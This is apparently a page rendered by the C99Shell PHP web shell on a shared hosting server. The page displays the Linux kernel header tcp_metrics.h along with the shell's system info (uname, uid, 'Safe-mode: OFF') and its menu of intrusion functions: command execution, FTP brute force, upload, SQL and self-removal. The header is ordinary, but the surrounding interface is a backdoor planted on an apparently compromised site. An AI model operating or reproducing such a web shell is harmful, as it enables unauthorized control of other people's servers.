!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/include/linux/   drwxr-xr-x
Free 6182.07 GB of 6263.27 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tcp_metrics.h (1.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
/* tcp_metrics.h - TCP Metrics Interface */

#ifndef _LINUX_TCP_METRICS_H
#define _LINUX_TCP_METRICS_H

#include <linux/types.h>

/* NETLINK_GENERIC related info
 */
#define TCP_METRICS_GENL_NAME        "tcp_metrics"
#define TCP_METRICS_GENL_VERSION    0x1

enum tcp_metric_index {
    TCP_METRIC_RTT,        /* in ms units */
    TCP_METRIC_RTTVAR,    /* in ms units */
    TCP_METRIC_SSTHRESH,
    TCP_METRIC_CWND,
    TCP_METRIC_REORDERING,

    TCP_METRIC_RTT_US,    /* in usec units */
    TCP_METRIC_RTTVAR_US,    /* in usec units */

    /* Always last.  */
    __TCP_METRIC_MAX,
};

#define TCP_METRIC_MAX    (__TCP_METRIC_MAX - 1)

enum {
    TCP_METRICS_ATTR_UNSPEC,
    TCP_METRICS_ATTR_ADDR_IPV4,        /* u32 */
    TCP_METRICS_ATTR_ADDR_IPV6,        /* binary */
    TCP_METRICS_ATTR_AGE,            /* msecs */
    TCP_METRICS_ATTR_TW_TSVAL,        /* u32, raw, rcv tsval */
    TCP_METRICS_ATTR_TW_TS_STAMP,        /* s32, sec age */
    TCP_METRICS_ATTR_VALS,            /* nested +1, u32 */
    TCP_METRICS_ATTR_FOPEN_MSS,        /* u16 */
    TCP_METRICS_ATTR_FOPEN_SYN_DROPS,    /* u16, count of drops */
    TCP_METRICS_ATTR_FOPEN_SYN_DROP_TS,    /* msecs age */
    TCP_METRICS_ATTR_FOPEN_COOKIE,        /* binary */
    TCP_METRICS_ATTR_SADDR_IPV4,        /* u32 */
    TCP_METRICS_ATTR_SADDR_IPV6,        /* binary */
    TCP_METRICS_ATTR_PAD,

    __TCP_METRICS_ATTR_MAX,
};

#define TCP_METRICS_ATTR_MAX    (__TCP_METRICS_ATTR_MAX - 1)

enum {
    TCP_METRICS_CMD_UNSPEC,
    TCP_METRICS_CMD_GET,
    TCP_METRICS_CMD_DEL,

    __TCP_METRICS_CMD_MAX,
};

#define TCP_METRICS_CMD_MAX    (__TCP_METRICS_CMD_MAX - 1)

#endif /* _LINUX_TCP_METRICS_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0118 ]--